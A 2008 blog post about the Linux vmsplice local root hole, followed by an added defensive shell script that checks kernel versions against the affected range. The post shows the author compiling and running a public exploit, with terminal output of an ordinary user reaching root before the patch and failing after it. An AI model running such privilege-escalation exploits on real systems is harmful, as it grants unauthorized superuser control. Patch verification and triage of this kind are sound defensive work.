Wednesday, February 13, 2008

Major Linux security hole found and fixed.

I just found out that there was a major Linux security hole after trying to figure out what the Linux kernel patch on the automatic update was for. After researching online, I found this:

The bug's effect is, in those versions of Linux using these kernels with this system call compiled in, to enable ordinary users with shell access to obtain root, superuser privileges. The security hole has been demonstrated in Debian, Fedora and Ubuntu.

Link

Tracked down the exploit code and tested it before the system update.

$ gcc exploit.c -o exploit
$ whoami
testuser
$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
# whoami
root

And after the update:

$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d61000 .. 0xb7d93000
[-] vmsplice: Bad address
$

Since I'm the only user on this computer and I don't install any programs, the exploit wasn't a big concern. However, this could be a big problem at my previous work, where there were multiple servers with thousands of shell users.
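Running a live root exploit on every box is not how you would triage a fleet of servers with thousands of shell users. A first pass is to classify each host's running kernel against the affected upstream range. The following script is an added example, not part of the original post or of the exploit author's code. It assumes the facts of the advisory for this bug (CVE-2008-0600): vmsplice() exists from 2.6.17 onward, mainline releases 2.6.17 up to and including 2.6.24.1 are affected, and the fix shipped in the stable releases 2.6.22.18, 2.6.23.16 and 2.6.24.2. The function names and the sample version strings are mine.

```shell
#!/bin/sh
# Added example (not from the original post): decide, from a kernel version
# string as printed by `uname -r`, whether its upstream base version falls in
# the range affected by the vmsplice local root bug (CVE-2008-0600):
# 2.6.17 up to and including 2.6.24.1, fixed in 2.6.22.18, 2.6.23.16, 2.6.24.2.

# Print the n-th dot-separated field of a version string, or 0 if it is absent.
vfield() {
    f=$(printf '%s' "$1" | cut -d. -f"$2")
    printf '%s' "${f:-0}"
}

# version_lt A B: succeed if A < B, comparing up to four numeric fields.
version_lt() {
    i=1
    while [ "$i" -le 4 ]; do
        a=$(vfield "$1" "$i")
        b=$(vfield "$2" "$i")
        if [ "$a" -lt "$b" ]; then return 0; fi
        if [ "$a" -gt "$b" ]; then return 1; fi
        i=$((i + 1))
    done
    return 1
}

# vmsplice_affected_by_version V: succeed if the upstream base of V is in the
# affected range. Everything after the first '-' ("-16-generic", "-137.fc8")
# is distribution packaging data and is stripped; see the caveat below.
vmsplice_affected_by_version() {
    v=${1%%-*}
    fix=""
    if version_lt "$v" 2.6.17; then return 1; fi   # no vmsplice() before 2.6.17
    if version_lt "$v" 2.6.22; then return 0; fi   # 2.6.17 .. 2.6.21: no fixed upstream release
    if version_lt "$v" 2.6.23; then fix=2.6.22.18
    elif version_lt "$v" 2.6.24; then fix=2.6.23.16
    elif version_lt "$v" 2.6.25; then fix=2.6.24.2
    else return 1                                  # 2.6.25 and later carry the fix
    fi
    if version_lt "$v" "$fix"; then return 0; fi
    return 1
}

# Stand-alone use: classify the running kernel.
if vmsplice_affected_by_version "$(uname -r)"; then
    echo "upstream base of $(uname -r) is in the affected range: check the distro advisory"
else
    echo "upstream base of $(uname -r) is outside the affected range"
fi
```

Treat a hit as "needs a look", not as proof: Debian, Fedora and Ubuntu backported the fix into kernels whose base version stays at 2.6.22 or 2.6.23, so a host whose distro package already contains the fix will still be flagged by this version test. The authoritative check for such hosts is the distribution's advisory and the installed package version, or a test like the one in the post on a disposable machine.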
